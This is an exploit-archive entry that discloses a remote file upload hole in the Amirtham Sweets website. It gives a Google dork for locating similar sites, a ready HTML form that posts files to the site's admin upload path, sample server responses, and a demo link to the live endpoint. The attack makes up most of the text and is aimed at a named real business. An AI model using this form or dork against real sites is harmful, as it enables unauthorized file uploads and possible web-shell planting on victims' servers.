Amirtham Sweets Remote File Upload Vulnerability

2018.06.11
id Mr.T959 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: Amirtham Sweets Remote File Upload Vulnerability # Google Dork: intext:Copyrights - 2017 Amirtham Sweets # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code : <form method='post' target='_blank' action='http://www.amirthamsweets.com/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form> # Exploit admin/server/php/ # Successful {"files[{"name":"s.jpg","size":161599,"type":"image\/jpeg","url":"http:\/\/www.amirthamsweets.com\/admin\/server\/php\/files\/s.jpg", # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo http://www.amirthamsweets.com/admin/server/php/

References:

http://mr-t959.xyz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top